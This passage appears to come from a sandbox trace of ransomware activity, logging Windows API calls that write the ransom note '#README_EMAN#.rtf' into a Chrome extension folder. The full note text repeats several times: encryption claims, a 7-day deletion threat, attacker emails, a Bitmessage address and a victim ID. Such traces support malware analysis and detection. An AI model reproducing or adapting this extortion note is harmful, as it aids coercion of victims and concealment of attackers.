th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓ8", lpUsedDefaultChar=0x0) returned 8717 [0271.419] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.419] CloseHandle (hObject=0x2ec) returned 1 [0271.420] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#readme_eman#.rtf")) returned 0xffffffff [0271.420] GetLastError () returned 0x2 [0271.420] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0271.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 